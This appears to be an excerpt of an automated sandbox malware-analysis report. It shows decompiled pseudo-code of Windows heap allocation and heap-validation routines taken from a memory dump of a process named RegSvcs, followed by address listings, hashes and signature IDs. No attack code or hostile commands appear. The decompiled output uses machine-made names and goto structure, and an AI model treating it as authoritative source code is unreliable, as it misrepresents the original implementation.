						E012FB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0130EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E013B4496(_t181, 0);
						_t177 = L01314620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E013B49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E013AFA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E012F1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E013216C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E013B4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x13e6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x13e6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x13e6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0139D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E012FB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E012FB150("Just allocated block at %p for %Ix bytes\n",  *0x13e6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x13e6378 = 1;
									 *0x13e60c0 = 0;
									asm("int3");
									 *0x13e6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x13e5708; // 0x0
					 *0x13eb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0134D130(0, _t177, _t181);
				}
			}





















                                          0x013b2d82
                                          0x013b2d84
                                          0x013b2d89
                                          0x013b2d8e
                                          0x013b2d90
                                          0x013b2d92
                                          0x013b2d97
                                          0x013b2d9a
                                          0x013b2da4
                                          0x013b2dc0
                                          0x013b2dc3
                                          0x013b2dd1
                                          0x013b2dd6
                                          0x013b2dd8
                                          0x013b30a7
                                          0x013b30a7
                                          0x013b30aa
                                          0x013b30aa
                                          0x013b30ad
                                          0x013b30b4
                                          0x00000000
                                          0x013b30b9
                                          0x013b2de3
                                          0x013b2de8
                                          0x013b2deb
                                          0x013b2dee
                                          0x013b2df1
                                          0x013b2df3
                                          0x013b2dfb
                                          0x013b2dfb
                                          0x013b2df5
                                          0x013b2df5
                                          0x013b2df5
                                          0x013b2e04
                                          0x013b2e0a
                                          0x013b2e0d
                                          0x013b2e11
                                          0x013b2e11
                                          0x013b2e12
                                          0x013b2e15
                                          0x013b2e18
                                          0x013b2e1a
                                          0x013b3027
                                          0x013b3027
                                          0x013b302d
                                          0x013b3030
                                          0x013b304f
                                          0x013b3054
                                          0x013b3032
                                          0x013b3047
                                          0x013b304c
                                          0x013b305a
                                          0x013b3063
                                          0x00000000
                                          0x013b2e20
                                          0x013b2e20
                                          0x013b2e23
                                          0x00000000
                                          0x00000000
                                          0x013b2e29
                                          0x013b2e2b
                                          0x013b2e47
                                          0x013b2e2d
                                          0x013b2e33
                                          0x013b2e38
                                          0x013b2e3f
                                          0x013b2e42
                                          0x013b2e42
                                          0x013b2e4e
                                          0x013b2e5d
                                          0x013b2e5f
                                          0x013b2e62
                                          0x013b2e66
                                          0x013b2e6b
                                          0x013b2e6d
                                          0x00000000
                                          0x013b2e73
                                          0x013b2e73
                                          0x013b2e76
                                          0x013b2e7a
                                          0x013b2e83
                                          0x013b2e83
                                          0x013b2e83
                                          0x013b2e85
                                          0x013b2e87
                                          0x013b2e8a
                                          0x013b2e8d
                                          0x013b2e92
                                          0x013b2e9c
                                          0x013b2e9f
                                          0x013b2ea1
                                          0x013b2ea2
                                          0x013b2ea6
                                          0x013b2ea6
                                          0x013b2e9f
                                          0x013b2eab
                                          0x013b2eaf
                                          0x013b2edf
                                          0x013b2ee2
                                          0x013b2ee5
                                          0x013b2eb1
                                          0x013b2eb3
                                          0x013b2eb8
                                          0x013b2ebd
                                          0x013b2ec4
                                          0x013b2ed6
                                          0x013b2ec6
                                          0x013b2ec7
                                          0x013b2ecc
                                          0x013b2ecf
                                          0x013b2ed2
                                          0x013b2ed2
                                          0x013b2ed9
                                          0x013b2ed9
                                          0x013b2ee8
                                          0x013b2eeb
                                          0x013b2eef
                                          0x013b2ef2
                                          0x013b2efe
                                          0x013b2f04
                                          0x013b2f04
                                          0x013b2f04
                                          0x013b2f06
                                          0x013b2f0d
                                          0x013b2f0f
                                          0x013b2f13
                                          0x013b2f13
                                          0x013b2f1b
                                          0x013b2f21
                                          0x013b2f27
                                          0x013b2f95
                                          0x013b2f98
                                          0x013b2f9b
                                          0x013b2fa0
                                          0x00000000
                                          0x00000000
                                          0x013b2fa6
                                          0x013b2fa9
                                          0x013b2fac
                                          0x00000000
                                          0x00000000
                                          0x013b2fb2
                                          0x013b2fb9
                                          0x00000000
                                          0x00000000
                                          0x013b2fc3
                                          0x013b2fca
                                          0x00000000
                                          0x00000000
                                          0x013b2fd0
                                          0x013b2fd6
                                          0x013b2fd9
                                          0x013b2ff8
                                          0x013b2ffd
                                          0x013b2fdb
                                          0x013b2ff0
                                          0x013b2ff5
                                          0x013b300e
                                          0x013b300f
                                          0x013b301a
                                          0x00000000
                                          0x013b2f29
                                          0x013b2f29
                                          0x013b2f2c
                                          0x013b2f4b
                                          0x013b2f50
                                          0x013b2f2e
                                          0x013b2f43
                                          0x013b2f48
                                          0x013b2f56
                                          0x013b2f64
                                          0x013b2f6c
                                          0x013b2f6c
                                          0x013b2f72
                                          0x013b2f76
                                          0x013b2f7c
                                          0x013b2f83
                                          0x013b2f89
                                          0x013b2f8a
                                          0x013b2f8a
                                          0x00000000
                                          0x013b2f76
                                          0x013b2f27
                                          0x013b2e6d
                                          0x013b2da6
                                          0x013b2dab
                                          0x013b2db3
                                          0x013b2db9
                                          0x013b30bc
                                          0x013b30c1
                                          0x013b30c1

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: afba1f6a0dd18be39a558dadee606b383d097e1f3025041d6aa8d663489690a9
                                          • Instruction ID: 1f5ae9ae74b1087d9d6dff9f3cea44f4cc287f502a1a0d157f58215126e6b3fe
                                          • Opcode Fuzzy Hash: afba1f6a0dd18be39a558dadee606b383d097e1f3025041d6aa8d663489690a9
                                          • Instruction Fuzzy Hash: F1912531610645DFDB22DF69C494AEEBBF2FF58718F18801DE64A5BB91E732A941CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B4AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E013B4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E012FB150();
						} else {
							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E012FB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E012FB150();
					} else {
						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E013AFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E012FB150();
						} else {
							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E012FB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E012FB150();
									} else {
										E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E012FB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E013AFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E012FB150();
										} else {
											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0134D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E013BA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0131E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E013BA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0131E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0131A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0131A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0131BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E013A23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E012F1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                          0x013b4af7
                                          0x013b4afb
                                          0x013b4afd
                                          0x013b4b01
                                          0x013b4b03
                                          0x013b4b08
                                          0x013b4b0a
                                          0x013b4b0f
                                          0x013b4eb5
                                          0x013b4eb5
                                          0x013b4ebb
                                          0x013b50d5
                                          0x013b50d8
                                          0x013b4ff6
                                          0x00000000
                                          0x013b4ff6
                                          0x013b50de
                                          0x013b50e4
                                          0x013b50e8
                                          0x013b5107
                                          0x013b510c
                                          0x013b50ea
                                          0x013b50ff
                                          0x013b5104
                                          0x013b5112
                                          0x013b5115
                                          0x013b5118
                                          0x013b5119
                                          0x013b50cb
                                          0x013b50cb
                                          0x013b50af
                                          0x00000000
                                          0x013b50af
                                          0x013b4ecb
                                          0x013b50b6
                                          0x013b50bb
                                          0x013b4ed1
                                          0x013b4ee6
                                          0x013b4eeb
                                          0x013b50c1
                                          0x013b50c2
                                          0x013b50c5
                                          0x013b50c6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b4b15
                                          0x013b4b15
                                          0x013b4b1c
                                          0x013b4b1e
                                          0x013b4b23
                                          0x013b4b27
                                          0x013b4b33
                                          0x013b4b38
                                          0x013b4b3a
                                          0x013b4b3c
                                          0x013b4b41
                                          0x013b4b41
                                          0x013b4b3a
                                          0x013b4b52
                                          0x013b5045
                                          0x013b504b
                                          0x013b504f
                                          0x013b506e
                                          0x013b5073
                                          0x013b5051
                                          0x013b5066
                                          0x013b506b
                                          0x013b5083
                                          0x013b5088
                                          0x013b5088
                                          0x013b508a
                                          0x013b5091
                                          0x013b5099
                                          0x013b5099
                                          0x013b509d
                                          0x013b50a7
                                          0x013b50ad
                                          0x013b50ad
                                          0x013b50ad
                                          0x00000000
                                          0x013b509d
                                          0x013b4b58
                                          0x013b4b5b
                                          0x013b4b5e
                                          0x013b4b63
                                          0x013b4b66
                                          0x013b4b69
                                          0x013b4b6f
                                          0x013b4be4
                                          0x013b4bf0
                                          0x013b4bf2
                                          0x013b4bf5
                                          0x013b4dc3
                                          0x013b4dc6
                                          0x013b4dc9
                                          0x013b4dce
                                          0x013b4dce
                                          0x013b4dd0
                                          0x013b4dd0
                                          0x013b4dd5
                                          0x013b4def
                                          0x013b4dd7
                                          0x013b4de7
                                          0x013b4de7
                                          0x013b4df3
                                          0x013b5001
                                          0x013b5007
                                          0x013b500b
                                          0x013b502a
                                          0x013b502f
                                          0x013b500d
                                          0x013b5022
                                          0x013b5027
                                          0x013b5039
                                          0x013b503a
                                          0x013b503b
                                          0x00000000
                                          0x013b4df9
                                          0x013b4dfd
                                          0x013b4e90
                                          0x013b4e94
                                          0x013b4e9e
                                          0x013b4ea4
                                          0x013b4ea4
                                          0x013b4ea4
                                          0x013b4ea6
                                          0x013b4ea6
                                          0x00000000
                                          0x013b4ea6
                                          0x013b4e03
                                          0x013b4e08
                                          0x013b4f88
                                          0x013b4f92
                                          0x013b4f99
                                          0x013b4f9c
                                          0x013b4fe0
                                          0x013b4fe4
                                          0x013b4fee
                                          0x013b4ff4
                                          0x013b4ff4
                                          0x013b4ff4
                                          0x00000000
                                          0x013b4fe4
                                          0x013b4f9e
                                          0x013b4fa4
                                          0x013b4fa8
                                          0x013b4fc7
                                          0x013b4fcc
                                          0x013b4faa
                                          0x013b4fbf
                                          0x013b4fc4
                                          0x013b4fd2
                                          0x013b4fd5
                                          0x013b4fd6
                                          0x013b4f34
                                          0x013b4f34
                                          0x00000000
                                          0x013b4f39
                                          0x013b4e0e
                                          0x013b4e14
                                          0x013b4e1b
                                          0x013b4e25
                                          0x013b4e2b
                                          0x013b4e2b
                                          0x013b4e33
                                          0x013b4e38
                                          0x013b4e8a
                                          0x013b4e8a
                                          0x00000000
                                          0x013b4e3a
